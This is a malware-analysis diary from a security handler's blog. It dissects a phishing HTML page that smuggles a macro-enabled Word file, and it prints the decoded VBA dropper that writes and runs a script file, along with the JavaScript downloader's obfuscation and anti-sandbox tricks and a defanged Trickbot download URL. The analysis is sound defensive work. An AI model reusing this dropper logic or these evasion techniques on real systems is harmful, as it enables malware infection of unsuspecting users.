Interesting JavaScript Obfuscation Example
Last Friday, one of our readers (thanks Mickael!) reported a phishing campaign based on a simple HTML page and asked us how to properly extract the malicious code from it. I analyzed the file and it looked interesting enough for a diary, both because a nice obfuscation technique was used in a JavaScript file and because the attacker tried to hinder automated analysis by padding the code with useless statements. In fact, the HTML page contains a malicious Word document encoded in Base64. HTML is wonderful because you can embed data into a page and the browser will automatically decode it. This is often used to deliver small pictures like logos:
<img src="data:image/png;base64,[your_base_64_encode_picture]">
Of course, the technique is the same to create links. That’s the technique used in this HTML page:
<a id="94dff0cf657696" href="data:application/msword;base64,[base64_data]" download="PurchaseSummary.docm" target="_blank">download</a>
Note that you can specify the name of the downloaded file ('PurchaseSummary.docm') and its MIME type ('application/msword'). This technique prevents the file from being processed by antivirus, proxies, etc. The web page looks like this once loaded in a browser:
To extract Base64-encoded strings from a file, you can use Didier's tool base64dump. In this case, it won't work out of the box because the Base64 string is polluted with HTML-encoded characters! The attacker simply replaced some characters with their HTML entity:
'c' -> '&#99;'
'a' -> '&#97;'
'/' -> '&#47;'
Why only these characters? No idea, but it's easy to fix. Let's convert them back on the fly, and now we can find interesting Base64 strings:
remnux@remnux:/tmp$ cat System_Authorization_Form_53435_html.2391943 | \
  sed 's/&#99;/c/g' | \
  sed 's/&#97;/a/g' | \
  sed 's/&#47;/\//g' | \
  base64dump.py -n 5000
ID  Size    Encoded          Decoded          MD5 decoded
--  ----    -------          -------          -----------
 1:  276516 UEsDBBQABgAIAAAA PK..........!.[  b809f8cdd3b47daf44483efaf73b2a6b
The first stream looks interesting because we see the beginning of a ZIP file, that's our Word document. Let’s decode it:
remnux@remnux:/tmp$ cat System_Authorization_Form_53435_html.2391943.html | \
  sed 's/&#99;/c/g'|sed 's/&#97;/a/g'|sed 's/&#47;/\//g' | \
  base64dump.py -n 5000 -s 1 -d >malicious.docm
remnux@remnux:/tmp$ file malicious.docm
malicious.docm: Microsoft Word 2007+
remnux@remnux:/tmp$ unzip -t malicious.docm
Archive: malicious.docm
    testing: [Content_Types].xml OK
    testing: _rels/.rels OK
    testing: word/_rels/document.xml.rels OK
    testing: word/document.xml OK
    testing: word/vbaProject.bin OK
    testing: word/media/image1.jpeg OK
    testing: word/_rels/vbaProject.bin.rels OK
    testing: word/theme/theme1.xml OK
    testing: word/vbaData.xml OK
    testing: word/settings.xml OK
    testing: docProps/app.xml OK
    testing: word/styles.xml OK
    testing: docProps/core.xml OK
    testing: word/fontTable.xml OK
    testing: word/webSettings.xml OK
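The same clean-up can be sketched in a few lines of JavaScript (Node.js), which may help when base64dump is not at hand. This is only an illustration, not the tooling used for this diary: the function names are made up, the sample payload is hypothetical, and the sketch assumes the pollution consists of decimal numeric HTML entities only.

```javascript
// Replace decimal numeric HTML entities with the character they encode.
function decodeNumericEntities(text) {
  return text.replace(/&#(\d+);/g, (_, code) => String.fromCharCode(Number(code)));
}

// Split a Base64 "data:" URI into its MIME type and decoded bytes.
// Entities are decoded first, mirroring the sed commands above.
function parseDataUri(uri) {
  const cleaned = decodeNumericEntities(uri);
  const match = /^data:([^;,]*);base64,(.*)$/s.exec(cleaned);
  if (!match) return null;
  return { mime: match[1], bytes: Buffer.from(match[2], "base64") };
}

// A ZIP container (and therefore a .docm file) starts with the bytes "PK".
function looksLikeZip(bytes) {
  return bytes.length >= 2 && bytes[0] === 0x50 && bytes[1] === 0x4b;
}

// Hypothetical payload: a ZIP-like header followed by filler text.
const original = Buffer.from("PK\u0003\u0004 hypothetical payload", "latin1");

// Pollute the Base64 text the way the attacker did: 'c', 'a' and '/'
// are swapped for their numeric entity.
const polluted = original
  .toString("base64")
  .replace(/[ca\/]/g, (ch) => "&#" + ch.charCodeAt(0) + ";");

const href = "data:application/msword;base64," + polluted;
const parsed = parseDataUri(href);

console.log(parsed.mime);                   // application/msword
console.log(looksLikeZip(parsed.bytes));    // true
console.log(parsed.bytes.equals(original)); // true
```

Decoding every numeric entity, rather than only the three seen in this sample, keeps the sketch usable if another campaign encodes a different set of characters.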
Let’s have a look at our Word document. It’s a classic document that asks the user to disable standard features to let the macro execute properly:
The macro looks interesting. First, it contains a lot of unneeded code placed into comments:
Sub autoopen()
Dim y0stwKSRAK0
R1ovvWHwXav = "End Function Set z8RNVW = New I3MKkfUg "
For ccccccccccc1 = 1 To 1000000000
Dim l7VgEVJS1
Dim y7FWWreec1
b1tDyphghzzU = " A5bZii = x5RNcWuD & Trim(B1cog.b4TMDx()) E9qmlG = P3PcneQA & Trim(u6zul.k9hXFlIu()) "
sttttttttrrrrrr = raaaaaaaaanstrrrrrr(3)
k8BSxwyH = "Private Sub Class u0LnXFT F1BOd = b1CoTMo & Trim(k6DDqKe.w8VCQ()) t9GhgrP = v6IZHz & Trim(N6fDmlo.I8guCAn()) "
a0QbyIquPy = "End Sub If Len(D0iSmR.A9AfR) > 0 Then "
S1fhDERlhedC = "While Not G7JGyC.x7siMbO "
If sttttttttrrrrrr = "mmm" Then
Dim F9OzltwVgSyw5
y1CnbwmVPS = "If Len(R4hUqNnA.U8Xko) > 0 Then If Len(T3TColVp.u4siG) > 0 Then Sub s3Qsi "
F3BWHPonwyJi = "If Len(z4bUPH.J2ClHnJe) > 0 Then For Each t2BJksf In w0wuX Set L7AABis = Nothing "
Here is the decoded/beautified macro:
Sub autoopen()
    For i = 1 To 1000000000
        s = get_random_string(3)
        If s = "mmm" Then
            opentextfile
        End If
    Next
End Sub

Sub opentextfile()
    payload = UserForm1.TextBox1.Text
    doc = ActiveDocument.AttachedTemplate.Path
    doc2 = doc
    doc2 = doc2 & Chr(92)
    doc2 = doc2 & get_random_string(7) & ".wsf"
    Open doc2 For Output As #33
    Print #33, payload
    Close #33
    Set WshScript = CreateObject("WScript.Shell")
    D = WshScript.Run(doc2, 1, False)
End Sub

Function get_random_string(n)
    Dim i, j, m, s, chars
    Randomize
    chars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"
    m = Len(chars)
    For i = 1 To n
        j = 1 + Int(m * Rnd())
        s = s & Mid(chars, j, 1)
    Next
    get_random_string = s
End Function
You can see that, instead of calling sleep() to delay the installation of the payload, the macro enters a loop of up to one billion iterations and performs the next infection steps once the randomly generated string is "mmm". I tested it in my sandbox several times and it works! I had to wait between 10 and 30 seconds.
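To get a feel for how long such a loop runs, the odds can be worked out from the decoded macro: the alphabet has 52 characters, so a given three-letter string comes up once every 52^3 = 140,608 draws on average. The sketch below is a JavaScript (Node.js) simulation of that loop, not the macro itself; the function names are mine and Math.random() stands in for VBA's Rnd().

```javascript
// Alphabet used by get_random_string() in the decoded macro.
const CHARS = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ";

// Chance that one random string of the given length equals a fixed target.
function hitProbability(length) {
  return 1 / Math.pow(CHARS.length, length);
}

// Average number of iterations before the first hit (geometric distribution).
function expectedIterations(length) {
  return Math.pow(CHARS.length, length);
}

// JavaScript stand-in for get_random_string(), for simulation only.
function getRandomString(n) {
  let s = "";
  for (let i = 0; i < n; i++) {
    s += CHARS[Math.floor(Math.random() * CHARS.length)];
  }
  return s;
}

// Count iterations until the target shows up, capped like the macro's loop.
function iterationsUntil(target, cap = 1000000000) {
  for (let i = 1; i <= cap; i++) {
    if (getRandomString(target.length) === target) return i;
  }
  return -1; // cap reached without a hit
}

console.log(expectedIterations(3));   // 140608
console.log(iterationsUntil("mmm"));  // varies from run to run
```

With roughly 140,000 iterations expected, the one-billion cap is very unlikely to be reached, which suggests that the delay seen in the sandbox comes from the cost of each iteration rather than from the size of the loop bound.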
The payload is extracted from a form embedded in the document ("UserForm1.TextBox1.Text"), dumped to disk and executed. The payload is a Windows Script File (JavaScript). The file is quite big for a downloader: 445KB on a single line! (SHA256: 975011bcc2ca1b6af470ca99c8a31cf0d9204d2f1d3bd666b0d5524c0bfdbf9e).
Once beautified, the code contains plenty of functions and looks like this:
var fPfEqdoors10 = String[
(function() { var kejparl_9 = { 44: "7", 163: "g", 259: "f", 824: function(val1) { return this[val1]; } }; return this[PbDpbaz('un', true, 'es')](kejparl_9[824](259)); })('addition12') +
(function() { var unwcome_4 = { 58: "h", 128: "r", 217: "c", 585: function(val1) { return this[val1]; } }; return this[PbDpbaz('un', true, 'es')](unwcome_4[585](128)); })('idea30') +
(function() { var wiqparli_8 = { 32: "d", 182: "o", 244: "b", 926: function(val1) { return this[val1]; } }; return this[PbDpbaz('un', true, 'es')](wiqparli_8[926](182)); })('addition12', 'being85', 'evades38') +
(function() { var hpslivel_6 = { 99: "k", 198: "p", 293: "m", 535: function(val1) { return this[val1]; } }; return this[PbDpbaz('un', true, 'es')](hpslivel_6[535](293)); })('being55', 'simple80', 'allow29', 'tactless28') +
(function() { var uuurelat_5 = { 93: "t", 167: "C", 295: "n", 605: function(val1) { return this[val1]; } }; return this[PbDpbaz('un', true, 'es')](uuurelat_5[605](167)); })('into78', 'Asimov96', 'must20', 'named30') +
(function() { var hujthei_8 = { 13: "h", 183: "e", 316: "k", 603: function(val1) { return this[val1]; } }; return this[PbDpbaz('un', true, 'es')](hujthei_8[603](13)); })('what7') +
(function() { var ekerooms_9 = { 91: "s", 111: "a", 323: "s", 504: function(val1) { return this[val1]; } }; return this[PbDpbaz('un', true, 'es')](ekerooms_9[504](111)); })('first65') +
(function() { var iuiagain_6 = { 63: "i", 121: "r", 338: "c", 558: function(val1) { return this[val1]; } }; return this[PbDpbaz('un', true, 'es')](iuiagain_6[558](121)); })('declarations33', 'provided43', 'second43') +
(function() { var jwvandpu_6 = { 35: "j", 166: "C", 244: "b", 876: function(val1) { return this[val1]; } }; return this[PbDpbaz('un', true, 'es')](jwvandpu_6[876](166)); })('while37', 'that88') +
(function() { var jhelivel_7 = { 48: "t", 131: "o", 384: "9", 666: function(val1) { return this[val1]; } }; return this[PbDpbaz('un', true, 'es')](jhelivel_7[666](131)); })('being55', 'simple80', 'allow29', 'tactless28') +
(function() { var jesrela_9 = { 98: "i", 173: "d", 483: "n", 737: function(val1) { return this[val1]; } }; return this[PbDpbaz('un', true, 'es')](jesrela_9[737](173)); })('into78', 'Asimov96', 'must20') +
(function() { var puiinth_5 = { 21: "e", 194: "g", 355: "a", 860: function(val1) { return this[val1]; } }; return this[PbDpbaz('un', true, 'es')](puiinth_5[860](21)); })('rooted48', 'thus6')
](92);
Just by scrolling through the code, you can distinguish a pattern. Obfuscated strings are built from functions that each return a single character, and the results are concatenated. Example:
function() { var kejparl_9 = { 44: "7", 163: "g", 259: "f", 824: function(val1) { return this[val1]; } }; return this[PbDpbaz('un', true, 'es')](kejparl_9[824](259)); }
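The function PbDpbaz() returns the string 'unescape', and the anonymous function returns one character from the dictionary 'kejparl_9', in this case 'f' (the element with key 259). If you apply this technique to the statement above, the concatenated characters spell 'fromCharCode' and you get:
var fPfEqdoors10 = String["fromCharCode"](92);
In other words, the variable simply holds a backslash (character code 92).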
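Because every chunk follows the same layout, the scheme can be undone statically, without running the script in an emulator. The following JavaScript (Node.js) sketch is one possible way to do it, not the method used for this diary: the names CHUNK, ENTRY and decodeChunks are mine, and it assumes each chunk declares its dictionary with `var`, lists plain one-character string values, and then looks up a numeric key exactly as in the excerpt. The unescape() wrapper is skipped because it leaves such single plain characters unchanged.

```javascript
// One obfuscated chunk: 'var NAME = { 44: "7", ..., 824: function...'
// followed later by 'NAME[824](259)', where 259 is the key actually used.
const CHUNK = /var\s+(\w+)\s*=\s*\{(.*?)\d+\s*:\s*function.*?\1\[\d+\]\((\d+)\)/gs;

// One dictionary entry such as: 259: "f"
const ENTRY = /(\d+)\s*:\s*"([^"]*)"/g;

// Rebuild the hidden string without executing any of the obfuscated code.
function decodeChunks(source) {
  let out = "";
  for (const [, , body, key] of source.matchAll(CHUNK)) {
    const table = new Map();
    for (const [, k, v] of body.matchAll(ENTRY)) table.set(k, v);
    out += table.has(key) ? table.get(key) : "?"; // "?" marks an unknown key
  }
  return out;
}

// First four chunks of the statement shown earlier in this diary.
const sample = `
(function() { var kejparl_9 = { 44: "7", 163: "g", 259: "f", 824: function(val1) { return this[val1]; } }; return this[PbDpbaz('un', true, 'es')](kejparl_9[824](259)); })('addition12') +
(function() { var unwcome_4 = { 58: "h", 128: "r", 217: "c", 585: function(val1) { return this[val1]; } }; return this[PbDpbaz('un', true, 'es')](unwcome_4[585](128)); })('idea30') +
(function() { var wiqparli_8 = { 32: "d", 182: "o", 244: "b", 926: function(val1) { return this[val1]; } }; return this[PbDpbaz('un', true, 'es')](wiqparli_8[926](182)); })('addition12', 'being85', 'evades38') +
(function() { var hpslivel_6 = { 99: "k", 198: "p", 293: "m", 535: function(val1) { return this[val1]; } }; return this[PbDpbaz('un', true, 'es')](hpslivel_6[535](293)); })('being55', 'simple80', 'allow29', 'tactless28')
`;

console.log(decodeChunks(sample)); // from
```

Working on the text with regular expressions is fragile if the obfuscator changes its layout, but it avoids executing any attacker-controlled code and is much faster than emulation on a 445KB script.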
The complete script is based on this technique and takes a lot of time to process in JavaScript emulators. I searched for occurrences of the letters 'h', 't', 't', 'p' in sequence and found the URL used to download the second stage:
var fPfEqbecause57 = "hxxps://185[.]159[.]82[.]237/odrivers/update-9367.php"
As well as parameters:
?oxx=s2 &u=abs&o=&v=&s=floorrandomfloorrandomfloorrandom
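The URL above is written in defanged form ('hxxps' and '[.]') so that it cannot be clicked or fetched by accident. As a small illustration of that convention, here is a JavaScript sketch with two helper functions whose names are mine; the sample address comes from a documentation-only IP range and is not part of this campaign.

```javascript
// Defang a URL for reports: neutralise the scheme and the dots in the host.
function defang(url) {
  const match = /^(https?):\/\/([^\/]+)(.*)$/i.exec(url);
  if (!match) return url; // not an http(s) URL, leave untouched
  const scheme = match[1].replace(/tt/i, "xx");
  const host = match[2].replace(/\./g, "[.]");
  return scheme + "://" + host + match[3];
}

// Reverse operation, for feeding an indicator back into a tool.
function refang(text) {
  return text.replace(/^hxxp/i, "http").replace(/\[\.\]/g, ".");
}

console.log(defang("https://192.0.2.10/path/file.php"));
// hxxps://192[.]0[.]2[.]10/path/file.php
```

Only the host part is bracketed, which matches the notation used for the URL in this diary.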
The script also implements an anti-sandbox trick. It displays a popup message that could block or delay an automated analysis:
var fPfEqmight1 = "A File Error Has Occurred";
if(fPfEqthrown7) {
    fPfEqwell7[(function() { ... })('into78', 'Asimov96')](unescape(fPfEqmight1), 30, unescape(fPfEqmost44), fPfEqconducted9);
}
The method name looked up on 'fPfEqwell7' decodes to 'Popup', which displays the message to the user for 30 seconds.
I was not able to trigger the download of the second stage (I was probably missing some arguments or a specific HTTP header) but, according to VirusTotal, the decoded URL delivers Trickbot.
Xavier Mertens (@xme)
Senior ISC Handler - Freelance Cyber Security Consultant